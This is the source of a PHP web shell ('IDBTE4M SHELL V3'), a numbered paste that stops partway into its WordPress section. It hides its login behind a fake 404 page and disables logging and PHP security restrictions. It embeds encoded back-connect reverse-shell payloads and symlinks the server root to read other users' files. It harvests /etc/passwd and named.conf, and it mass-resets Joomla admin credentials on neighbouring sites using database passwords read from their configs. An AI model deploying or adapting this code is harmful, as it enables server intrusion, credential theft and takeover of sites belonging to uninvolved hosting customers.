-=[ IDBTE4M ]=-

1. <?php
2. @session_start();
3. @define('SELF_PATH', __FILE__);
4. $auth_pass = "608e7dc116de7157306012b4f0be82ac";
5. $cookie_hour_expire = 24;
6. if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {
7. header('HTTP/1.0 404 Not Found');
8. exit;
9. }
10. function printLogin() { ?>
11.  
12. <html><head><title>404 Not Found</title></head>
13. <style>
14. input { margin:0;background-color:#fff;border:1px solid #fff; }
15. </style>
16. <body>
17. <h1>Not Found</h1>
18. <p>The requested URL <? $_SERVER['PHP_SELF'] ?> was not found on this server.</p>
19. <p>Additionally, a 404 Not Found error was encounteblue while trying to use an ErrorDocument to handle the request.</p>
20. <hr>
21. <form method=post>
22. <address><?=$_SERVER['SERVER_SIGNATURE'] ?><center><input type=password name=x><input type=submit value=''></center></address>
23. </form></body></html>
24. <?php
25. exit;
26. }
27. $cookie_value = md5($_SERVER['HTTP_HOST'] . "dm" . $auth_pass);
28. if (isset($_POST['x'])) {
29. if (md5($_POST['x']) != $auth_pass) {
30. printLogin();
31. } else {
32. setcookie("dm", $cookie_value, time() + (60 * (60 * $cookie_hour_expire)));
33. }
34. } elseif (isset($_COOKIE['dm'])) {
35. if ($_COOKIE['dm'] != $cookie_value) {
36. printLogin();
37. }
38. } elseif (!isset($_COOKIE['dm'])) {
39. printLogin();
40. }
41. if (isset($_POST['logout'])) {
42. setcookie("dm", "", time() - (60 * (60 * 60 * 360000)));
43. $page = $host = 'http://' . $_SERVER['SERVER_NAME'] . '/' . $_SERVER['PHP_SELF'];
44. echo '<center><span class="b1"> Please Wait ...</scan></center>';
45. ?>
46. <script>window.location.href = '<?php print $page; ?>';</script>
47. <?php exit(0);
48. }
49. @set_time_limit(0);
50. @error_reporting(0);
51. @ini_set('log_errors', 0);
52. @ini_set('error_log', NULL);
53. @ini_restore("safe_mode");
54. @ignore_user_abort(FALSE);
55. @ini_restore("open_basedir");
56. @set_magic_quotes_runtime(0);
57. @ini_restore("allow_url_fopen");
58. @ini_set('max_execution_time', 0);
59. @ini_restore("disable_functions");
60. @ini_restore("safe_mode_exec_dir");
61. @ini_restore("safe_mode_include_dir");
62. @ini_set('zlib.output_compression', 'Off');
63. $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
64. $u = explode("/",$pageURL );
65. $pageURL =str_replace($u[count($u)-1],"",$pageURL );
66.  
67. $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
68. $u = explode("/",$pageFTP );
69. $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
70.  
71.  
72. if(get_magic_quotes_gpc()){
73. foreach($_POST as $key=>$value){
74. $_POST[$key] = stripslashes($value);
75. }
76. }
77. $back_connect="fZFRS8MwF IXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0StktGB8aihs prPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28jS2whVulCf lCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZja3ImclYa gh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92 +rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
78. $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29r WhyEzc+Z2TjpSserABYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl9 ? 5 /3Wa43fpotyCABR95zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vK C1rI6wgSmN/niYb75i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVC nim7a/ZuJC0JTwf3ARkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlx iuPB3E0/gXejiHMcYjwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3X Ie1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
79. $jumper="3VRRb5swEP4rFwvNRqVAtkmTEiCTpk7aHjppe5rSiBlsilfAyDZrs2r/fefQpM3LfsCEMObuu++7Ox/IutVAMserTkLdcWvzG1L3otIPN6TInMFbQK07O/IBXa/RStbAAttDDmpQ5a10jFreyLLXQtIQ8hzSEDYwQ6huGroCoSQjV8Zos4JvRzC6vwxZ4kSBi/GLT6PIhPp1ykUNjUbNbVlWb969vYN+OSwh89mcILd8z32yHFojm5xuaEHi4OGa9zImWcKR2OMLuBLKKX ? 1dlrssQY0CzpR+zjTwGZ8db+HTIPQgreJ3E7yq9bhfA4kFd5LR7zRyqpcsDGMCz1qwvgxhpibhGqx0pY ? eVneqVYyma3gcjit0LrLzRoxwYTaSrk9lII2ooglQDbPEEDOHR9w4Y2V7u4NBAWMEHPYnhh4Ovkgt4wf ? D/9vIPBONUYdu4MXzP0BJMVhp7Zqn10JwZFL6la7hvVSfZopG6Yce+ho84oM74g8AJtif73H6MLGCZph41 ? aq+CWNwwHxPRFT0mMGCy3jtV6Ji9aeRDPEAo89t/Akmre5nQ+BQR0wSr6VRdtq7vEjqLsmfGBUZRn6O3K1saPGh/nuzA6R2HIstxsu0cZqNTNEq/9KJSNIf5NvorUBcXft9o5K1beGIAbueikF76/wLdftTTIGCxg+NAkM0+PyvnvBRS/MOZHOanMgX14pviLw=="; ?>
80.  
81. <HTML>
82. <HEAD>
83. <link href="http://g22b.cc/upload/font.php?file_manager" rel="stylesheet" type="text/css">
84. <title>-=[ IDBTE4M ]=-</title>
85. <link rel="SHORTCUT ICON" href="http://kefiex.yu.tl/files/bnx.png">
86. <body style="background-image: url('http://2.bp.blogspot.com/-LPgZM8E1nKE/VA_RSPtWNvI/AAAAAAAAAu4/Dzs4tTNniFw/s1600/1w2w3.png'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
87. <script type="text/javascript" src="jquery-1.10.1.min.js" tppabs="http://code.jquery.com/jquery-1.10.1.min.js"></script>
88. <script type="text/javascript">
89. $(document).ready(function() {
90. $(".flip").click(function() {
91. $(".panel").slideToggle("slow");
92. });
93. });
94. </script>
95.  
96. <style type="text/css">
97. div.panel,p.flip {
98. margin: 0px;
99. padding: 0px;
100. text-align: center;
101. background: transparent;
102. }
103.  
104. a.panel {
105. background: transparent;
106. display: none;
107. }
108. </style>
109. </head>
110. <style type="text/css">
111. a { text-decoration:none; }
112. a:hover{ border-bottom:1px solid yellow; }
113.  
114. *{ font-size:11px;font-family:Tahoma,Verdana,Arial;color:#FFFFFF; }
115.  
116. #menu{ background:#111111;margin:8px 2px 4px 2px; }
117.  
118. #menu a{ padding:4px 18px;
119. margin:0;
120.  
121. background:#222222;
122. text-decoration:none;
123. letter-spacing:2px;
124. border-radius: 4px;
125. border-bottom:2px solid #444444;
126. border-top:2px solid #444444;
127. border-right:2px solid blue;
128. border-left:2px solid blue;
129. }
130.  
131. #menu a:hover{
132. background:#191919;
133. border-radius: 7px;
134. border-bottom:2px solid #yellow;
135. border-top:2px solid #yellow;
136. border-right:2px solid #FF0000;
137. border-left:2px solid #FF0000;
138. }
139.  
140. .tabnet{ margin:15px auto 0 auto;border: 1px solid #333333; }
141.  
142. .main {
143. width:90%;
144. margin:30px auto 10px;
145. padding:10px 10px 5px 10px;
146. border-radius:5px;
147. -moz-border-radius:5px;
148. -moz-box-shadow:0px 0px 10px #FFFFFF;
149. }
150.  
151. .gaya { color: blue; }
152.  
153. .gaya a { color: yellow; }
154.  
155. .inputz{ background:#111111;
156. border:0;
157. padding:2px;
158. border-bottom:1px solid #FF0000;
159. border-top:1px solid #FF0000; }
160.  
161. .inputzbut{
162. background:#111111;
163. color:#FF0000;
164. margin:0 4px;
165. border:1px solid #444444;
166. border-bottom:1px solid #FF0000;
167. border-top:1px solid #FF0000;
168. border-right:1px solid #FF0000;
169. border-left:1px solid #FF0000;
170. }
171.  
172. .inputz:hover, .inputzbut:hover{
173. border-bottom:1px solid yellow;
174. border-top:1px solid yellow;
175. }
176.  
177. .output { margin:auto;
178. border:1px solid #FF0000;
179. width:100%;
180. height:400px;
181. background:#000000;
182. padding:0 2px; }
183.  
184. .cmdbox{ width:100%; }
185.  
186. .head_info{ padding: 0 4px; }
187.  
188. .dminfox {
189. font-size:11px;
190. font-family:Tahoma,Verdana,Arial;
191. color:yellow;
192. }
193.  
194. .infodmx {
195. font-size:11px;
196. font-family:Tahoma,Verdana,Arial;
197. color:blue;
198. }
199.  
200. .b0{
201. font-size:30px;padding:0;color:#444444;
202. }
203. .b1{
204. font-size:25px;padding:0;color:blue;
205. }
206. .b2{
207. font-size:25px;padding:0;color:yellow;
208. }
209. .b3{
210. font-size:10px;padding:0;color:blue;
211. }
212. .b4{
213. font-size:20px;padding:0;color:#FF0000;
214. }
215. .b5{
216. font-size:20px;padding:0;color:#FFFFFF;
217. }
218. .b6{
219. font-size:20px;padding:0;color:#00FF00;
220. }
221. .b7{
222. font-size:20px;padding:0;color:blue;
223. }
224. .b8{
225. font-size:20px;padding:0;color:yellow;
226. }
227. .b9{
228. font-size:20px;padding:0;color:yellow;
229. }
230. .b10{
231. font-size:20px;padding:0;color:#444444;
232. }
233. .b11{
234. font-size:10px;padding:0;color:yellow;
235. }
236. .b12{
237. font-size:10px;padding:0;color:#444444;
238. }
239.  
240. .b_tbl{ text-align:center;
241. margin:0 1px 0 0;
242. padding:0 1px 0 0;
243. border-right:1px solid #333333; }
244.  
245. .c_tbl{ text-align:center;
246. margin:0 4px 0 0;
247. padding:0 4px 0 0;
248. border-left:1px solid #333333; }
249.  
250. .phpinfo table{ width:100%;
251. padding:0 0 0 0; }
252.  
253. .phpinfo td{ background:#191919;
254. color:#cccccc;
255. padding:6px 8px;; }
256.  
257. .phpinfo th, th{ background:#111111;
258. border-bottom:1px solid #333333;
259. font-weight:normal; }
260.  
261. .phpinfo h2, .phpinfo h2 a{ text-align:center;
262. font-size:16px;
263. padding:0;
264. margin:30px 0 0 0;
265. background:#222222;
266. padding:4px 0; }
267.  
268. .explore{ width:100%; }
269.  
270. .explore a { text-decoration:none; }
271. .explore td{ border-bottom:1px solid yellow;
272. padding:0 8px;
273. line-height:10px; }
274.  
275. .explore th{ padding:3px 8px;
276. font-weight:normal; }
277.  
278. .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid yellow; }
279.  
280. .explore tr:hover{ background:#444444;
281. cursor:pointer; }
282.  
283. .viewfile{ background:#EDECEB;
284. color:#000000;
285. margin:4px 2px;
286. padding:8px; }
287.  
288. .sembunyi{ display:none;
289. padding:0;margin:0;}
290.  
291. .info{ background:#111111;
292. width:99%;
293. padding:5px;
294. margin:10px auto 5px;
295. text-align:center;
296. font-size:13px;}
297.  
298. .info a{ font-size:14px;}
299. .info span{ font-size:14px;}
300. .jaya{ margin:5px; text-align:right; }
301. </style>
302. </head>
303. <center><SCRIPT>
304. farbbibliothek = new Array();
305. farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100");
306. farbbibliothek[1] = new Array("#00FF00","#000000","#00FF00","#00FF00");
307. farbbibliothek[2] = new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00");
308. farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040");
309. farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000");
310. farbbibliothek[5] = new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF");
311. farbbibliothek[6] = new Array("#0000FF","#FFFF00");
312. farben = farbbibliothek[4];
313. function farbschrift()
314. {
315. for(var i=0 ; i<Buchstabe.length; i++)
316. {
317. document.all["a"+i].style.color=farben[i];
318. }
319. farbverlauf();
320. }
321. function string2array(text)
322. {
323. Buchstabe = new Array();
324. while(farben.length<text.length)
325. {
326. farben = farben.concat(farben);
327. }
328. k=0;
329. while(k<=text.length)
330. {
331. Buchstabe[k] = text.charAt(k);
332. k++;
333. }
334. }
335. function divserzeugen()
336. {
337. for(var i=0 ; i<Buchstabe.length; i++)
338. {
339. document.write("<font face='monotype corsiva' size=30><span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span></font>");
340. }
341. farbschrift();
342. }
343. var a=1;
344. function farbverlauf()
345. {
346. for(var i=0 ; i<farben.length; i++)
347. {
348. farben[i-1]=farben[i];
349. }
350. farben[farben.length-1]=farben[-1];
351.  
352. setTimeout("farbschrift()",30);
353. }
354. var farbsatz=1;
355. function farbtauscher()
356. {
357. farben = farbbibliothek[farbsatz];
358. while(farben.length<text.length)
359. {
360. farben = farben.concat(farben);
361. }
362. farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001));
363. }
364. setInterval("farbtauscher()",5000);
365. text= "-=[+] IDBTE4M SHELL V3 [+]=- ";
366. </script><span class='newclass'>
367. <script type="text/javascript">
368. string2array(text);
369. divserzeugen();
370. </script></span></center></tbody></table><br/>
371. <script type="text/javascript">
372. function tukar(lama,baru){ document.getElementById(lama).style.display = "none"; document.getElementById(baru).style.display = "block"; } </script> <table border="1"><tbody>
373. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
374. <center>
375.  
376. <tr><td>
377.  
378.  
379. <center>
380. <div id="menu" align="center"><table><tr>
381. <td style=\"text-align:center;\"><nobr><b></b><a href="?">-=[ HOME </a></nobr></td>
382. <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "y=".$pwd; ?>&amp;x=php">EVAL</a></b></nobr></td>
383. <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "y=".$pwd; ?>&amp;x=mysql">SQL 1</a></b></nobr></td>
384. <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">INFO</a></b></nobr></td>
385. <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">SPLOIT</a></b></nobr></td>
386. <td style=\"text-align:center;\"><nobr><b><a href="?idb=salto">SALTO ]=-</a></b></nobr></td>
387. </tr></table></div>
388.  
389. <div id="menu" align="center"><table><tr>
390. <td style=\"text-align:center;\"><b><a href="?<?php echo "y=".$pwd; ?>&amp;x=shell">-=[ SHELL</a></b></td>
391. <td style=\"text-align:center;\"><b><a href="?sws=sym">SYM1</a></b></td>
392. <td style=\"text-align:center;\"><b><a href="?idb=domain">Domain</a></b></td>
393. <td style=\"text-align:center;\"><b><a href="?sws=file">Manual</a></b></td>
394. <td style=\"text-align:center;\"><b><a href="?sws=passwd">Bypass</a></b></td>
395. <td style=\"text-align:center;\"><b><a href="?idb=auto">Auto ]=-</a></b></td>
396. </tr></table></div>
397.  
398. <div id="menu" align="center"><table><tr>
399. <td style=\"text-align:center;\"><b><a href="?sws=joomla">-=[ Joomla</a></b></td>
400. <td style=\"text-align:center;\"><b><a href="?sws=wp">WordPress</a></b></td>
401. <td style=\"text-align:center;\"><b><a href="?sws=vb">vBulletin</a></b></td>
402. <td style=\"text-align:center;\"><b><a href="?idb=sql">SQL2</a></b></td>
403. <td style=\"text-align:center;\"><b><a href="?idb=config">CONFIG</a></b></td>
404. <td style=\"text-align:center;\"><b><a href="?idb=cp">CP++ ]=-</a></b></td>
405. </tr></table></div>
406.  
407. </center>
408. <p>
409. <center>
410. <div class="mg">
411. <?php
412. if(is_readable("/etc/named.conf")){
413. echo '-=[ <a href="?do=etc_named.conf" ><font color="green">/etc/named.conf</font> ]-';
414. }else{
415. echo '-[ <font color="blue">/etc/named.conf</font> ]-';
416. }
417.  
418. if(is_readable("/etc/passwd")){
419. echo '-[ <a href="?do=etc_passwd" ><font color="green">/etc/passwd</font> ]-';
420. }else{
421. echo '-[ <font color="blue">/etc/passwd</font> ]-';
422. }
423.  
424. if(is_readable("/etc/valiases")){
425. echo '-[ <a href="?do=etc_valiases" ><font color="green">/etc/valiases exists</font> ]-';
426.  
427. }else{
428. echo '-[ <font color="blue">/etc/valiases</font> ]-';
429. }
430.  
431. if(is_readable("/var/named")){
432. echo '-[ <a href="?do=var_named" ><font color="green">/var/named</font> ]=-';
433.  
434. }else{
435. echo '-[ <font color="blue">/var/named</font> ]=-';
436. }
437.  
438. ?></center>
439. </div></div> </tr></table></tbody></table> </div>
440.  
441. <?php
442.  
443. @mkdir('empek',0777);
444. $htcs = "Options Indexes FollowSymLinks\nDirectoryIndex amis.txt\nAddType txt .php\nAddHandler txt .php";
445. $f =@fopen ('empek/.htaccess','w');
446. fwrite($f , $htcs);
447. @symlink("/","empek/amis.txt");
448. $pg = basename(__FILE__);
449.  
450. @mkdir('idb',0777);
451. $htcs = "Options all
452. DirectoryIndex Sux.html
453. AddType text/plain .php
454. AddHandler server-parsed .php
455. AddType text/plain .html
456. AddHandler txt .html
457. Require None
458. Satisfy Any";
459. $f =@fopen ('idb/.htaccess','w');
460. fwrite($f , $htcs);
461. @symlink("/","idb/te4m");
462. $pg = basename(__FILE__);
463.  
464.  
465.  
466.  
467.  
468. if(isset($_REQUEST['sws']))
469. {
470.  
471. switch ($_REQUEST['sws'])
472. {
473.  
474. /// user + domine + symlink ///
475.  
476. case 'sym':
477.  
478. if(!is_file('named.txt')){
479.  
480. $d00m = @file("/etc/named.conf");
481.  
482. }else{
483.  
484. $d00m = @file("named.txt");
485.  
486.  
487. }
488. if(!$d00m)
489. {
490.  
491. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
492. }
493. else
494.  
495. {
496. echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
497. foreach($d00m as $dom){
498.  
499. if(eregi("zone",$dom)){
500.  
501. preg_match_all('#zone "(.*)"#', $dom, $domsws);
502.  
503. flush();
504.  
505. if(strlen(trim($domsws[1][0])) > 2){
506.  
507. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
508.  
509. flush();
510.  
511.  
512.  
513. $site = $user['name'] ;
514.  
515.  
516. @symlink("/","empek/amis.txt");
517.  
518. $site = $domsws[1][0];
519.  
520. $ir = 'ir';
521.  
522. $il = 'il';
523.  
524. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
525. {
526. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px blue; '>".$domsws[1][0]."</div>";
527. }
528.  
529.  
530. echo "
531. <tr>
532.  
533. <td>
534. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
535. </td>
536.  
537.  
538. <td>
539. ".$user['name']."
540. </td>
541.  
542.  
543.  
544.  
545.  
546.  
547. <td>
548. <a href='empek/amis.txt/home/".$user['name']."/public_html' target='_blank'>symlink </a>
549. </td>
550.  
551.  
552. </tr></div> ";
553.  
554.  
555. flush();
556. flush();
557.  
558. }
559. }
560. }
561. }
562.  
563.  
564.  
565.  
566. break;
567.  
568.  
569. /// file symlink ///
570.  
571. case 'file':
572.  
573. echo'
574. The file path to symlink
575.  
576. <br /><br />
577. <form method="post">
578. <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
579. <input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
580. <input type="submit" value="symlink" name="symlink" /> <br /><br />
581.  
582.  
583.  
584. </form>
585. ';
586.  
587. $pfile = $_POST['file'];
588. $symfile = $_POST['symfile'];
589. $symlink = $_POST['symlink'];
590.  
591. if ($symlink)
592. {
593.  
594.  
595. @mkdir('sym1',0777);
596. $c = "Options Indexes FollowSymLinks\nDirectoryIndex tr.phtml\nAddType txt .php\nAddHandler txt .php";
597. $f =@fopen ('sym1/.htaccess','w');
598. @fwrite($f , $c);
599.  
600. @symlink("$pfile","sym1/$symfile");
601.  
602. echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';
603.  
604. }
605.  
606.  
607.  
608. break;
609.  
610. /// bypass read
611.  
612. case 'read':
613.  
614. echo "read /etc/named.conf";
615. echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
616. flush();
617. flush();
618.  
619.  
620. $file = '/etc/named.conf';
621.  
622.  
623. $r3ad = @fopen($file, 'r');
624. if ($r3ad){
625. $content = @fread($r3ad, @filesize($file));
626. echo "".htmlentities($content)."";
627. }
628. else if (!$r3ad)
629. {
630. $r3ad = @show_source($file) ;
631. }
632. else if (!$r3ad)
633. {
634. $r3ad = @highlight_file($file);
635. }
636. else if (!$r3ad)
637. {
638. $sm = @symlink($file,'sym.txt');
639.  
640.  
641. if ($sm){
642. $r3ad = @fopen('empek/sym.txt', 'r');
643. $content = @fread($r3ad, @filesize($file));
644. echo "".htmlentities($content)."";
645.  
646. }
647. }
648.  
649.  
650.  
651. echo "</textarea><br /><br /><input type='submit' value='Save'/> </form>";
652.  
653.  
654. if(isset($_GET['save'])){
655.  
656.  
657. $cont = stripcslashes($_POST['file']);
658.  
659. $f = fopen('named.txt','w');
660.  
661. $w = fwrite($f,$cont);
662.  
663. if($w){
664.  
665. echo '<br />save has been successfully';
666.  
667. }
668.  
669. fclose($f);
670.  
671.  
672.  
673.  
674. }
675.  
676.  
677.  
678. break;
679.  
680. // passwd
681.  
682. case 'passwd':
683.  
684. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
685.  
686.  
687. $cont = stripcslashes($_POST['file']);
688.  
689. if(!file_exists('passwd.txt')){
690.  
691. $f = @fopen('passwd.txt','w');
692.  
693. $w = @fwrite($f,$cont);
694.  
695. fclose($f);
696. }
697. if($w or @filesize('passwd.txt') > 0){
698. // * SHOW * //
699.  
700. echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
701. flush();
702.  
703. $fil3 = file('passwd.txt');
704.  
705. foreach ($fil3 as $f){
706.  
707. $u=explode(':', $f);
708. $user = $u['0'];
709.  
710.  
711.  
712. echo "
713. <tr>
714.  
715.  
716.  
717. <td width='15%'>
718. $user
719. </td>
720.  
721.  
722.  
723.  
724.  
725.  
726. <td width='10%'>
727. <a href='empek/amis.txt/home/$user/public_html' target='_blank'>Symlink </a>
728. </td>
729.  
730. <td width='10%'>
731. <a href='$pageFTP/empek/amis.txt/home/$user/public_html' target='_blank'>FTP</a>
732. </td>
733.  
734.  
735.  
736. </tr></div> ";
737.  
738.  
739. flush();
740. flush();
741.  
742.  
743. }
744.  
745.  
746.  
747.  
748.  
749.  
750. die ("</tr></div>");
751.  
752.  
753. }
754.  
755.  
756.  
757.  
758.  
759. }
760.  
761.  
762.  
763. echo "read /etc/passwd";
764. echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
765. flush();
766.  
767. $file = '/etc/passwd';
768.  
769.  
770. $r3ad = @fopen($file, 'r');
771. if ($r3ad){
772. $content = @fread($r3ad, @filesize($file));
773. echo "".htmlentities($content)."";
774. }
775. elseif(!$r3ad)
776. {
777. $r3ad = @show_source($file) ;
778. }
779. elseif(!$r3ad)
780. {
781. $r3ad = @highlight_file($file);
782. }
783. elseif(!$r3ad)
784. {
785.  
786. for($uid=0;$uid<1000;$uid++){
787. $ara = posix_getpwuid($uid);
788. if (!empty($ara)) {
789. while (list ($key, $val) = each($ara)){
790. print "$val:";
791. }
792. print "\n";
793. }
794.  
795. }
796.  
797. }
798.  
799.  
800. flush();
801.  
802.  
803. echo "</textarea><br /><br /><input type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
804. flush();
805.  
806. break;
807.  
808. case 'joomla':
809.  
810. /////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////
811.  
812.  
813. if(isset($_POST['s'])){
814.  
815. $file = @file_get_contents('joomla.txt');
816.  
817. $ex = explode("\n",$file);
818.  
819. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
820. flush();
821.  
822.  
823. foreach ($ex as $exp){
824.  
825. $es = explode("||",$exp);
826.  
827. $config = $es[0];
828.  
829. $domin = $es[1];
830.  
831. $domins = trim($domin).'';
832.  
833. $readconfig = @file_get_contents(trim($config));
834.  
835. if(ereg('JConfig',$readconfig)){
836.  
837.  
838.  
839. $pass = ex($readconfig,'$password = \'',"';");
840.  
841. $userdb = ex($readconfig,'$user = \'',"';");
842.  
843. $db = ex($readconfig,'$db = \'',"';");
844.  
845. $fix = ex($readconfig,'$dbprefix = \'',"';");
846.  
847. $tab = $fix.'users';
848.  
849.  
850. $con = @mysql_connect('localhost',$userdb,$pass);
851.  
852. $db = @mysql_select_db($db,$con);
853.  
854. $query = @mysql_query("UPDATE `$tab` SET `username` ='sec-w.com'");
855.  
856.  
857. $query3 = @mysql_query("UPDATE `$tab` SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");
858.  
859.  
860. if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}else{$r = '<b style="color:blue">failed</b>';}
861.  
862. $domins = trim($domin).'';
863.  
864. echo "<tr>
865. <td><a target='_blank' href='http://$domins'>$domin</a></td>
866. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
867. flush();
868.  
869.  
870.  
871. }else{
872.  
873. echo "<tr>
874. <td><a target='_blank' href='http://$domins'>$domin</a></td>
875. <td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:blue'>failed</tr>";
876. flush();
877.  
878. }
879.  
880. }
881.  
882.  
883.  
884.  
885.  
886.  
887.  
888.  
889.  
890. die();
891.  
892. }
893.  
894. if(!is_file('named.txt')){
895.  
896. $d00m = @file("/etc/named.conf");
897.  
898. flush();
899.  
900.  
901. }else{
902.  
903. $d00m = file("named.txt");
904.  
905.  
906. }
907. if(!$d00m)
908. {
909.  
910. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
911. }
912. else
913.  
914. {
915. echo "<div class='tmp'>
916. <form method='POST' action='$pg?sws=joomla'>
917. <input type='submit' value='Mass ching Admin' />
918. <input type='hidden' value='1' name='s' />
919. </form><br /><br />
920. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
921.  
922. $f = fopen('joomla.txt','w');
923.  
924. foreach($d00m as $dom){
925.  
926. if(eregi("zone",$dom)){
927.  
928. preg_match_all('#zone "(.*)"#', $dom, $domsws);
929.  
930. if(strlen(trim($domsws[1][0])) > 2){
931.  
932. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
933.  
934. ///////////////////////////////////////////////////////////////////////////////////
935.  
936. $wpl=$pageURL."idb/te4m/home/".$user['name']."/public_html/configuration.php";
937. $wpp=get_headers($wpl);
938. $wp=$wpp[0];
939.  
940. $wp2=$pageURL."idb/te4m/home/".$user['name']."/public_html/blog/configuration.php";
941. $wpp2=get_headers($wp2);
942. $wp12=$wpp2[0];
943.  
944. $wp3=$pageURL."idb/te4m/home/".$user['name']."/public_html/joomla/configuration.php";
945. $wpp3=get_headers($wp3);
946. $wp13=$wpp3[0];
947.  
948.  
949. ////////// joomla ////////////
950.  
951. $pos = strpos($wp, "200");
952. $config="&nbsp;";
953.  
954. if (strpos($wp, "200") == true )
955. {
956. $config= $wpl;
957. }
958. elseif (strpos($wp12, "200") == true)
959. {
960. $config= $wp2;
961. }
962. elseif (strpos($wp13, "200") == true)
963. {
964. $config= $wp3;
965. }
966. else
967. {
968. continue;
969.  
970. }
971. flush();
972.  
973. /////////////////////////////////////////////////////////////////////////////////////
974.  
975. $dom = $domsws[1][0];
976.  
977. $w = fwrite($f,"$config||$dom \n");
978. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:blue">failed</b>';}
979.  
980.  
981. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
982. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
983.  
984.  
985.  
986.  
987.  
988. flush();
989.  
990.  
991. }
992. }
993. }
994. }
995.  
996.  
997. break;
998.  
999. case 'wp':
1000.  
1001. ############################ index #########################3
1002.  
1003.  
1004.  
1005.  
1006.  
1007.  
1008. ######## admin ##########33
1009.  
